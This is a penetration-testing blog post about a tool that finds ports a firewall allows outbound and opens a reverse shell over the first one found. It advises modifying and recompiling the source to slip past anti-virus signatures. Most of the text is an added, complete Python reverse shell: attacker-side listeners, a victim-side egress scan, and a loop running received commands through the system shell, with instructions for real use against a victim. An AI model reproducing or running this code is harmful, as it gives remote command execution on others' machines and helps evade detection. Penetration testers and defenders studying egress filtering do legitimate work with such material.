July 09, 2012

Egress Buster Reverse Shell and Bypassing AV

Written by David Kennedy
Penetration Testing Security Testing & Analysis
Back in February Dave Kennedy released a tool called Egress Buster that looks for allowed outbound ports and tells you what egress rules are in place behind a firewall. It worked by attempting a TCP connection on each and every port from inside the firewall to an externally facing server that was listening on all of those ports; whichever connections arrived revealed the ports the firewall let out.

Today we would like to announce the release of the Egress Buster Reverse Shell. It scans outbound from the internal host for a port the firewall allows and, once a connection has been established on one, spawns a reverse shell over it. Benchmark testing showed about 1,000 ports were tested in under five seconds. It is almost identical in use to the original Egress Buster; the difference is that once a stable connection is identified, a command prompt pops up on the listener for you to enter commands on the victim machine. Note that the egressbuster shell and listener are not platform specific: they can be run on nix-based systems (Linux, OSX, etc.) and any version of Windows.

Below is the server running and listening on ports 1-1000.

[Screenshot: egress buster reverse shell listening]

On the victim machine, here is the payload run without any parameters.

[Screenshot: rev shell victim]

Now we kick off the egressbuster reverse shell payload on the victim machine.

[Screenshot: executing egress buster reverse shell]

On the listener side of the house, we now have a command shell, having tested over 1,000 ports until we found one that lets us out:

[Screenshot: egress buster listener shell]

This is effective in situations where you need to deploy a payload to a victim machine and do not know which ports it is allowed to use outbound. As an example, during a penetration test we were able to attack the victim through a file upload vulnerability that let us upload and execute binaries, but we could not figure out a port that was allowed outbound: standard ports such as 80, 443, 21 and 53 were all found to be blocked.
However, by utilizing the egress busting technique with the shell payload, we were able to find an obscure port that was allowed out to the attacker machine. This is just a rough proof of concept and a simple command shell; in our situation we used the technique to write a binary file out to the victim machine and execute it.

As with anything custom and new, it won't be picked up by any anti-virus until this blog post comes out. Once it is, just modify the source and byte compile it again to get around the signature.

[Screenshot: bypassing AV]

You can download the egress buster reverse shell from the Downloads - Tools and Exploits section. Note that the egressbuster has already been pre-byte-compiled and ships as a standard executable. Source code is included in everything.
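To make the mechanics concrete, here is an added minimal implementation of the technique in Python, written for this post and not taken from the egressbuster source. It assumes the layout the post describes: the attacker's listener binds every candidate port, the victim tries each candidate port in turn, and the first connection that gets through carries a simple command shell. The `demo()` function wires both halves together on localhost; the listener binding only port 47025 while the victim scans 47000-47039 stands in for a firewall that allows a single obscure port. The port numbers, the length-prefixed framing and all function names are my own choices, and the simulated "blocked" ports refuse instantly, whereas a real firewall that silently drops packets makes each probe wait out the connect timeout.

```python
"""Added example: minimal egress-busting reverse shell (listener + payload).
Not the egressbuster source; layout assumed from the post."""
import select
import socket
import struct
import subprocess
import threading


def open_listeners(host, ports):
    """Attacker side: bind one listening socket per candidate port.
    Ports already in use on the attacker box are skipped, not fatal."""
    socks = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            s.bind((host, port))
            s.listen(1)
            socks.append(s)
        except OSError:
            s.close()
    return socks


def accept_first(socks, timeout):
    """Attacker side: wait for the first victim connection on any bound port,
    then close the other listeners. Returns (conn, port) or (None, None)."""
    readable, _, _ = select.select(socks, [], [], timeout)
    conn, port = None, None
    if readable:
        conn, _ = readable[0].accept()
        port = readable[0].getsockname()[1]
    for s in socks:
        s.close()
    return conn, port


def egress_bust(host, ports, timeout=0.25):
    """Victim side: try a TCP connect to each candidate port; return the first
    socket the firewall lets out as (sock, port), else (None, None).
    The short timeout matters: a firewall that silently drops packets makes
    every blocked port wait the full timeout; refused ports fail instantly."""
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        if s.connect_ex((host, port)) == 0:
            s.settimeout(None)
            return s, port
        s.close()
    return None, None


def send_frame(sock, data):
    """Length-prefixed framing (my choice) so output of any size is delimited."""
    sock.sendall(struct.pack("!I", len(data)) + data)


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the channel")
        buf += chunk
    return buf


def recv_frame(sock):
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    return recv_exact(sock, length)


def serve_shell(sock):
    """Victim side: run each received command with the system shell and send
    back combined stdout/stderr. An empty command ends the session."""
    try:
        while True:
            cmd = recv_frame(sock).decode(errors="replace").strip()
            if not cmd:
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            send_frame(sock, proc.stdout + proc.stderr)
    finally:
        sock.close()


def run_remote(conn, cmd):
    """Attacker side: send one command line and return its output as text."""
    send_frame(conn, cmd.encode())
    return recv_frame(conn).decode(errors="replace")


def demo(host="127.0.0.1", scan_ports=range(47000, 47040), listen_ports=(47025,)):
    """Both halves on localhost; listening on 47025 only while scanning
    47000-47039 simulates a firewall that allows one obscure port.
    Returns {"port": port found, "output": result of 'echo egress-ok'}."""
    socks = open_listeners(host, listen_ports)
    result = {}

    def attacker():
        conn, port = accept_first(socks, timeout=10)
        result["port"] = port
        if conn is not None:
            result["output"] = run_remote(conn, "echo egress-ok").strip()
            send_frame(conn, b"")  # empty command: tell the victim to hang up
            conn.close()

    t = threading.Thread(target=attacker)
    t.start()
    sock, _ = egress_bust(host, scan_ports)
    if sock is not None:
        serve_shell(sock)
    t.join()
    return result


if __name__ == "__main__":
    print(demo())
```

Running the file prints `{'port': 47025, 'output': 'egress-ok'}`. To use the two halves for real, call `open_listeners` and `accept_first` on the external box (binding ports below 1024 such as the post's 1-1000 needs root on nix systems) and `egress_bust` followed by `serve_shell` on the victim, pointing it at the listener's address; a real engagement would also want the scan parallelised, since a silently dropping firewall costs one timeout per blocked port.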